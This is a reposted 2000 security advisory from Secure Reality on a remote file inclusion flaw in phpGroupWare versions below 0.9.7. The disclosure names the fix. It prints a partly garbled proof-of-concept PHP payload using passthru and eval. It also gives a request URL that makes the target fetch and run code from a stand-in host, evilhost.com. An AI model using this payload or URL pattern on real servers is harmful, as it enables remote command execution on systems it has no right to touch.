Advisories : Remote command execution vulnerabilities in phpGroupWare

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Remote command execution vulnerabilities in phpGroupWare

Title:	Remote command execution vulnerabilities in phpGroupWare
Released by:	Secure Reality
Date:	6th December 2000
Printable version:	Click here

=================================================

Secure Reality Pty Ltd. Security Advisory #6 (SRADV00006)

http://www.securereality.com.au

=================================================



[Title]

Remote command execution vulnerabilities in phpGroupWare



[Released]

6/11/2000



[Vulnerable]

Versions below 0.9.7 under Unix



[Overview]

phpGroupWare is a multi-user web based groupware suite written in PHP.

phpGroupWare is quite popular due to its integration of many aspects of

group cooperation: email, calendaring, file sharing, to do lists, etc.



phpGroupWare makes insecure calls to the include() function of PHP which can

allow the inclusion of remote files, and thereby the execution of arbitrary

commands on the remote web server with the permissions of the web server

user, usually 'nobody'



[Impact]

Remote command execution (with privileges as above)



[Detail]

This is an excellent example of another aspect of the remotely accessible

include files issue that has been discussed in detail recently. The

discussion has centered around the sensitive information that can be

contained in include files and the fact that include files generally have

the extension 'inc' and thus, if web accessible, are returned to the

requestor in plain text.



A common solution amongst freely available php scripts is to give include

files the extension .inc.php. This causes the include file to always be

processed by the PHP interpreter and therefore not return in plain text

sensitive configuration information, like database passwords. Thus these

programs can have easy installation (untar everything into the web space)

without worrying about configuration disclosure.



The problem however then becomes one of context. Code and configuration

variables in include files tend to be highly interdependent, that is,

certain files and data must have already been included before including a

particular file. By directly requesting the files we can break the

interdependence chain and cause data the include files could normally trust

to become untrustworthy.



Which leads us to the phpGroupWare vulnerability. We can directly request

the library include files that make up the phpGroupWare API, one of these

files, phpgw.inc.php performs an include based on variables that should have

been set as part of the call chain. By providing them ourselves we can

determine the initial part of the following include statement:



include($phpgw_info["server"]["include_root"] .

"/phpgwapi/phpgw_info.inc.php");



By providing $phpgw_info[server][include_root] as a form variable that

points to a remote web server on which we can place files, we can get the

script to retrieve /phpgwapi/phpgw_info.inc.php from that server and execute

it.



For example, if I had access to place files in a webspace

http://evilhost.com/~shaun/ I would create a directory "phpgwapi" and place

inside it a script called phpgw_info.inc.php with content like the

following:



");

                passthru("id");

        ';



        // If we were called via remote include, send the code to be

        // executed

        if (substr($HTTP_SERVER_VARS["HTTP_USER_AGENT"], 0, 3) == "PHP")

                echo("");

        else

        // Otherwise we're being executed on the target web server already,

        // so simply evaluate the code

                eval($phpcode);



        exit();



?>



(This script is designed so that the server it is placed on can be PHP

enabled and not result in the code being executed on the attacking machine)



If we then make a request to the target machine like the following:



/phpgroupware/inc/phpgwapi/phpgw.inc.php?phpgw_info[server][include_root]=ht

tp://evilhost.com/~shaun



The code should be retrieved and executed.



It should be noted there are some caveats to this attack:

- The remote web server must be able to retrieve the file, i.e no firewalls

in the way

- The remote web server must not be running PHP under Windows since remote

file includes are not supported on this platform

- The remote web server must be running a sufficiently recent version of PHP

that [][] form variables are allowed

- The remote web server must not have allow_url_fopen set off

- Later versions of phpGroupWare check the variable

$phpgw_info["server"]["header_version"] in phpgw.inc.php, for those versions

we need to provide that via form variables too



There may well be others based on other versions/configurations of PHP.



[Fix]

Please upgrade to the latest version of phpGroupWare (0.9.7) at

http://sourceforge.net/project/showfiles.php?group_id=7305



[Acknowledgements]

Our thanks to all of the developers of phpGroupWare, in particular Dan

Kuykendall, for their assistance in quickly correcting this issue.



[Disclaimer]

Advice, directions and instructions on security vulnerabilities in this

advisory do not constitute: an endorsement of illegal behavior; a guarantee

that protection measures will work; an endorsement of any product or

solution or recommendations on behalf of Secure Reality Pty Ltd. Content is

provided as is and Secure Reality Pty Ltd does not accept responsibility for

any damage or injury caused as a result of its use.